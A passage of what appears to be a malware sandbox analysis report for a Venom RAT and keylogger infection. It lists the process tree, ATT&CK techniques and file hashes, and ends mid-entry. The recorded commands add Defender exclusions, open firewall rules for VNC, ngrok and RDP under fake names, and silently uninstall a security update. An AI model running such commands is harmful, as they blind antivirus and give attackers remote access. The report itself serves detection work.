"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution5.vbs"
4⤵
PID:5088

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:3288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming
4⤵
PID:3160

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\ & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:3556

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:344

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Program Files\RDP Wrapper & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1200

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Program Files\RDP Wrapper
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1688

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom.exe & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1808

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom.exe
4⤵
PID:1404

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\winvnc.exe & exit
3⤵
PID:3596

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\winvnc.exe
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4184

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\ngrok.exe & exit
3⤵
PID:1564

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\ngrok.exe
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1644

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\enableff.exe & exit
3⤵
PID:3656

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\enableff.exe
4⤵
PID:3692

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\Adduser.exe & exit
3⤵
PID:1260

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\Adduser.exe
4⤵
PID:4668

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\ngrok.exe & exit
3⤵
PID:3356

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\ngrok.exe
4⤵
PID:4816

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\Venomadd.exe & exit
3⤵
PID:956

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\Venomadd.exe
4⤵
PID:5112

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\Venomdpr.exe & exit
3⤵
PID:1572

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\Venomdpr.exe
4⤵
PID:4624

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\autoupdate1.exe & exit
3⤵
PID:2892

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\autoupdate2.exe & exit
3⤵
PID:2228

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\update.exe & exit
3⤵
PID:1888

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\enableff.exe & exit
3⤵
PID:4448

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\allow.exe & exit
3⤵
PID:4300

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\VenomDWelbasiD.exe & exit
3⤵
PID:4144

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Program Files\RDP Wrapper & exit
3⤵
PID:4568

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b netsh advfirewall firewall add rule name=vnc action=allow dir=in protocol=tcp localport=5901 & exit
3⤵
PID:4892

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Venom-winvnc" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\Venom-winvnc.exe" enable=yes & exit
3⤵
PID:4644

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Venom-ngrok" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\Venom-ngrok.exe" enable=yes & exit
3⤵
PID:1016

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Venom-winvnc" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\ngrok.exe" enable=yes & exit
3⤵
PID:5016

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Venom-winvnc" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\winvnc.exe" enable=yes & exit
3⤵
PID:1680

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Venom-winvnc" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\rdpinstall.exe" enable=yes & exit
3⤵
PID:4112

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Venom-winvnc" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\rdpinstall.exe" enable=yes & exit
3⤵
PID:1104

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Windows Folder" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\autoupdate1.exe" enable=yes & exit
3⤵
PID:4048

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Windows Service" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\autoupdate2.exe" enable=yes & exit
3⤵
PID:1552

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Windows Task" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\update.exe" enable=yes & exit
3⤵
PID:852

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Windows" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\venom_nkrok.exe" enable=yes & exit
3⤵
PID:992

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Windows System" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\venom\nkrok.exe" enable=yes & exit
3⤵
PID:4800

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "ngrok" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\Venom-ngrok.exe" -Action Allow & exit
3⤵
PID:812

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "ngrok" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\Venom-ngrok.exe" -Action Allow & exit
3⤵
PID:5096

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "vnc" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\Venom-winvnc.exe" -Action Allow & exit
3⤵
PID:4152

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "rdp" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\rdpinstall.exe" -Action Allow & exit
3⤵
PID:5100

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "vnc" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\Venom-winvnc.exe" -Action Allow & exit
3⤵
PID:4916

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "rdp" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\rdpinstall.exe" -Action Allow & exit
3⤵
PID:3980

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:4876

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Google" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\ngrok.exe" -Action Allow & exit
3⤵
- Blocklisted process makes network request
- Executes dropped EXE
PID:820

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Google" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\ngrok.exe" -Action Allow & exit
3⤵
PID:1036

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Chrome" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\winvnc.exe" -Action Allow & exit
3⤵
PID:1068

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Chrome" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\winvnc.exe" -Action Allow & exit
3⤵
PID:4136

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows Update" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\rdpinstall.exe" -Action Allow & exit
3⤵
PID:4860

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows Update" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\rdpinstall.exe" -Action Allow & exit
3⤵
PID:3760

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows task" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\autoupdate1.exe" -Action Allow & exit
3⤵
PID:3932

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows task" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\autoupdate1.exe" -Action Allow & exit
3⤵
PID:4484

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows Service" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\autoupdate2.exe" -Action Allow & exit
3⤵
PID:3928

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows Service" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\autoupdate2.exe" -Action Allow & exit
3⤵
PID:2420

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:4788

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows Folder" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\update.exe" -Action Allow & exit
3⤵
PID:4888

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows Folder" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\update.exe" -Action Allow & exit
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1404

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\venom_nkrok.exe" -Action Allow & exit
3⤵
PID:2172

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows System" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\venom\nkrok.exe" -Action Allow & exit
3⤵
PID:4436

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\venom_nkrok.exe" -Action Allow & exit
3⤵
PID:4528

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows System" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\venom\nkrok.exe" -Action Allow & exit
3⤵
PID:4728

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b netsh advfirewall firewall add rule name=vnc action=allow dir=in protocol=tcp localport=5900 & exit
3⤵
PID:1532

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Program Files (x86)\RDP Wrapper & exit
3⤵
PID:4732

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b wusa /uninstall /kb:4471332 /quiet & exit
3⤵
PID:4520

C:\Users\Admin\AppData\Roaming\loader.exe
"C:\Users\Admin\AppData\Roaming\loader.exe"
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1376

C:\Users\Admin\AppData\Roaming\loader.exe
"C:\Users\Admin\AppData\Roaming\loader.exe"
3⤵
PID:820

C:\Users\Admin\AppData\Roaming\loader.exe
"C:\Users\Admin\AppData\Roaming\loader.exe"
4⤵
- Executes dropped EXE
PID:1232

C:\Users\Admin\AppData\Roaming\loader.exe
"C:\Users\Admin\AppData\Roaming\loader.exe"
5⤵
- Executes dropped EXE
PID:5044

C:\Users\Admin\AppData\Roaming\loader.exe
"C:\Users\Admin\AppData\Roaming\loader.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:3640

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution.vbs"
1⤵
- Adds Run key to start application
PID:4200

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:5104

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Execution.vbs
MD5
a76dc4fbd53fe8d087cb78ff16134a26

SHA1
8f565d5b491f4f7b27e6af34bb7798f9b5bb558b

SHA256
b15dbb3f1554b1e6b0a66423df0a205b157276e2e3d31d7a1c7dd480d615e1e6

SHA512
69de3d0f22c921f07e0db2324d4dfcec717a1cdcb47b24f19a53d21f7876b9099ff1a7e44ae037c38e1cc864d53b8ecac45c8b376bd7e497dd745c4347307470

Download Submit
C:\Users\Admin\AppData\Local\Execution2.vbs
MD5
cf1d37e3ccdde125c06f1383c88d9358

SHA1
dcb51cbdab941e7cec28817ffae2fba1f27f1931

SHA256
35873184c68848d8275eea24d4484870cad72972c34e4c553786fec6f4321d7a

SHA512
dade8e3835b9f4b317ab2a7e4e52b4df619b4e1ccb3ede46d90a440b77da1f9ffb30804e5b889c866661122f16b6a44319b71ddaf277f4bb43acf24f076b3d0b

Download Submit
C:\Users\Admin\AppData\Local\Execution5.vbs
MD5
05a460cc05b28e1fc6ee9aadd0e2e7b1

SHA1
4ac79e93d6467e809acfbb2a5b0370537fb99460

SHA256
2e841a3b2fcb2f3e5f87a25656a85cd6ea8bd9c04421ac636239fccc5f7cc7a9

SHA512
471f54955d054cfe3b2f23a801e84f7261e70271c18bc9bba736cab948a6c4544b62b40f318d4a55df29e3e640f0529432fe7b69822238dbbcec222da86b13f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8YCK9U05\Xvl[1].exe
MD5
cc902def500205aab6f429545192f812

SHA1
2ccfceac617697f11bc060843f2ac81dcd655244

SHA256
ec1235d8980d63398de5811dc806194fa522565436f820e1f90424e7d4b4a0a1

SHA512
f7d6976187a4be1c825b058ab7db4cfea5e679288b4384352f9782aa69975ab9b302352da3fbf9f3ee30262479e2e273d60c46567dc184e4919314c5dc27d92f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
MD5
88ab0bb59b0b20816a833ba91c1606d3

SHA1
72c09b7789a4bac8fee41227d101daed8437edeb

SHA256
f4fb42c8312a6002a8783e2a1ab4571eb89e92cd192b1a21e8c4582205c37312

SHA512
05cff2ca00ba940d9371c469bce6ffb4795c845d77525b8a1d4919f708296e66c0a6f3143c5964f5e963955e4f527a70624651113e72dc977f5ef40fa0276857

Download Submit
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
MD5
88ab0bb59b0b20816a833ba91c1606d3

SHA1
72c09b7789a4bac8fee41227d101daed8437edeb

SHA256
f4fb42c8312a6002a8783e2a1ab4571eb89e92cd192b1a21e8c4582205c37312

SHA512
05cff2ca00ba940d9371c469bce6ffb4795c845d77525b8a1d4919f708296e66c0a6f3143c5964f5e963955e4f527a70624651113e72dc977f5ef40fa0276857

Download Submit
C:\Users\Admin\AppData\Local\Temp\compile.vbs
MD5
ca906422a558f4bc9e471709f62ec1a9

SHA1
e3da070007fdeae52779964df6f71fcb697ffb06

SHA256
abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee

SHA512
661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b

Download Submit
C:\Users\Admin\AppData\Local\Temp\compile.vbs
MD5
ca906422a558f4bc9e471709f62ec1a9

SHA1
e3da070007fdeae52779964df6f71fcb697ffb06

SHA256
abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee

SHA512
661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b

Download Submit
C:\Users\Admin\AppData\Local\Temp\config
MD5
6c5c5aaadd88e8c19bbed9b070d135ef

SHA1
abc6ecb99646ddafb3575b01e0f65ca48da4e55c

SHA256
0e9e23a0758e739f54690f1b3f3880731d23bb5592e30badbe2fd857d3e77a15

SHA512
94e0653ef293aa4fcff73244554ec0c158c8e781af122b063f189972d92261a208591d51a0d3a08077ffde15311717e9d8c0404b810bfc182bc4cd66c3781bc1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\A148453D7DB34E8789CC5F9EFA2DDF22DAAD9ADB
MD5
8d9ae8f584f8ec4a42c1b44c6c28e276

SHA1
803b39c50ae97bbb8abe54d462be2e4aa056db53

SHA256
dd2477744f96c5565d717a4167fa804f9400645d0ffe16d347e3ab8b32405d30

SHA512
e34a522edd605fe2d8ab774a5a993388b744759f1d016038790e4d128f764806020321f1b65fb47203d4f344158eedc5f53145ef483d7800e731c24dd9bbeef0

Download Submit
C:\Users\Admin\AppData\Roaming\keylogger py best.exe
MD5
a20d50809d850ea9621ec8056ca52ee9

SHA1
47cd25041ec4a8c2ef397c2afd09fd2aaf6d3cd7

SHA256
ceeedbfa74c764a7a927e33d3a8fe3fd6f2de12af2a7d9e0558062c3afa0581f

SHA512
0f5b564403149bb0ca7851e989b433f00152ec9a95e0c52f4f3fc86f29832cc803c4969b4d06c1823b436facd6d987c448d5c640f01cc011025abe21a523643f

Download Submit
C:\Users\Admin\AppData\Roaming\keylogger py best.exe
MD5
a20d50809d850ea9621ec8056ca52ee9

SHA1
47cd25041ec4a8c2ef397c2afd09fd2aaf6d3cd7

SHA256
ceeedbfa74c764a7a927e33d3a8fe3fd6f2de12af2a7d9e0558062c3afa0581f

SHA512
0f5b564403149bb0ca7851e989b433f00152ec9a95e0c52f4f3fc86f29832cc803c4969b4d06c1823b436facd6d987c448d5c640f01cc011025abe21a523643f

Download Submit
C:\Users\Admin\AppData\Roaming\loader.exe
MD5
cd8ab729965533ed53755d09ad10c790

SHA1
d09623a311dad9eb598cd2ef234ea1d6bfaf318e

SHA256
9e8d78ad8a4a11f3904d7cb5b06d08ffdb73262f2f44d810e5b5b6dcb15c736f

SHA512
834714dbbad108be2c1a52f0338782b4fee10b9ab999526dd175b338fe98b58857e36104a5300e989ae9bfa1e7432004ab5a5d422c9d23067941457f7abc6b0f

Download Submit
C:\Users\Admin\AppData\Roaming\loader.exe
MD5
cd8ab729965533ed53755d09ad10c790

SHA1
d09623a311dad9eb598cd2ef234ea1d6bfaf318e

SHA256
9e8d78ad8a4a11f3904d7cb5b06d08ffdb73262f2f44d810e5b5b6dcb15c736f

SHA512
834714dbbad108be2c1a52f0338782b4fee10b9ab999526dd175b338fe98b58857e36104a5300e989ae9bfa1e7432004ab5a5d422c9d23067941457f7abc6b0f

Download Submit
C:\Users\Admin\AppData\Roaming\loader.exe
MD5
cc902def500205aab6f429545192f812

SHA1
2ccfceac617697f11bc060843f2ac81dcd655244

SHA256
ec1235d8980d63398de5811dc806194fa522565436f820e1f90424e7d4b4a0a1

SHA512
f7d6976187a4be1c825b058ab7db4cfea5e679288b4384352f9782aa69975ab9b302352da3fbf9f3ee30262479e2e273d60c46567dc184e4919314c5dc27d92f

Download Submit
C:\Users\Admin\AppData\Roaming\loader.exe
MD5
cc902def500205aab6f429545192f812

SHA1
2ccfceac617697f11bc060843f2ac81dcd655244

SHA256
ec1235d8980d63398de5811dc806194fa522565436f820e1f90424e7d4b4a0a1

SHA512
f7d6976187a4be1c825b058ab7db4cfea5e679288b4384352f9782aa69975ab9b302352da3fbf9f3ee30262479e2e273d60c46567dc184e4919314c5dc27d92f

Download Submit
C:\Users\Admin\AppData\Roaming\loader.exe
MD5
9afa5b759296fb418e2bcb1b43894945

SHA1
32ae808e83aa68d2c093357ad60bb9cd5aeb16d9

SHA256
987506daa9d7e8c4c64395c241b944f42a80fb74d5cb0a2f7e86d33b3f725155

SHA512
54fcfe17b96c338957839c54880a8e7f7fed220e4200886f28420a194c17325585a73b0ee5f15daf281a2569cf02bd4f246bf00931803e3ee1d5d64df1d2da36

Download Submit
C:\Users\Admin\AppData\Roaming\loader.exe
MD5
9afa5b759296fb418e2bcb1b43894945

SHA1
32ae808e83aa68d2c093357ad60bb9cd5aeb16d9

SHA256
987506daa9d7e8c4c64395c241b944f42a80fb74d5cb0a2f7e86d33b3f725155

SHA512
54fcfe17b96c338957839c54880a8e7f7fed220e4200886f28420a194c17325585a73b0ee5f15daf281a2569cf02bd4f246bf00931803e3ee1d5d64df1d2da36

Download Submit
C:\Users\Admin\AppData\Roaming\loader.exe
MD5
9afa5b759296fb418e2bcb1b43894945

SHA1
32ae808e83aa68d2c093357ad60bb9cd5aeb16d9

SHA256
987506daa9d7e8c4c64395c241b944f42a80fb74d5cb0a2f7e86d33b3f725155

SHA512
54fcfe17b96c338957839c54880a8e7f7fed220e4200886f28420a194c17325585a73b0ee5f15daf281a2569cf02bd4f246bf00931803e3ee1d5d64df1d2da36

Download Submit
C:\Users\Admin\AppData\Roaming\loader.exe
MD5
9afa5b759296fb418e2bcb1b43894945

SHA1
32ae808e83aa68d2c093357ad60bb9cd5aeb16d9

SHA256
987506daa9d7e8c4c64395c241b944f42a80fb74d5cb0a2f7e86d33b3f725155

SHA512
54fcfe17b96c338957839c54880a8e7f7fed220e4200886f28420a194c17325585a73b0ee5f15daf281a2569cf02bd4f246bf00931803e3ee1d5d64df1d2da36

Download Submit
C:\Users\Admin\AppData\Roaming\rat v6.exe
MD5
8a177113878be7de28f07a9f2b2bd56a

SHA1
355d23771a07b4c6aaf86c6c28eb61f873b7e000

SHA256
26fd51dc28ce76d5aa5914bdf6f9cac0a6afd41d1f13c9af2c299f92e339216d

SHA512
1407fc16318918f0314bcf8ad9c5c7e2690f7fd3260246b93e131f83ff355cc52528e1cd13cd2ef809000673b070508ae0b675de4554090fac8483be8ffe6b6b

Download Submit
C:\Users\Admin\AppData\Roaming\rat v6.exe
MD5
8a177113878be7de28f07a9f2b2bd56a

SHA1
355d23771a07b4c6aaf86c6c28eb61f873b7e000

SHA256
26fd51dc28ce76d5aa5914bdf6f9cac0a6afd41d1f13c9af2c299f92e339216d

SHA512
1407fc16318918f0314bcf8ad9c5c7e2690f7fd3260246b93e131f83ff355cc52528e1cd13cd2ef809000673b070508ae0b675de4554090fac8483be8ffe6b6b

Download Submit
C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe
MD5
8a177113878be7de28f07a9f2b2bd56a

SHA1
355d23771a07b4c6aaf86c6c28eb61f873b7e000

SHA256
26fd51dc28ce76d5aa5914bdf6f9cac0a6afd41d1f13c9af2c299f92e339216d

SHA512
1407fc16318918f0314bcf8ad9c5c7e2690f7fd3260246b93e131f83ff355cc52528e1cd13cd2ef809000673b070508ae0b675de4554090fac8483be8ffe6b6b

Download Submit
C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe
MD5
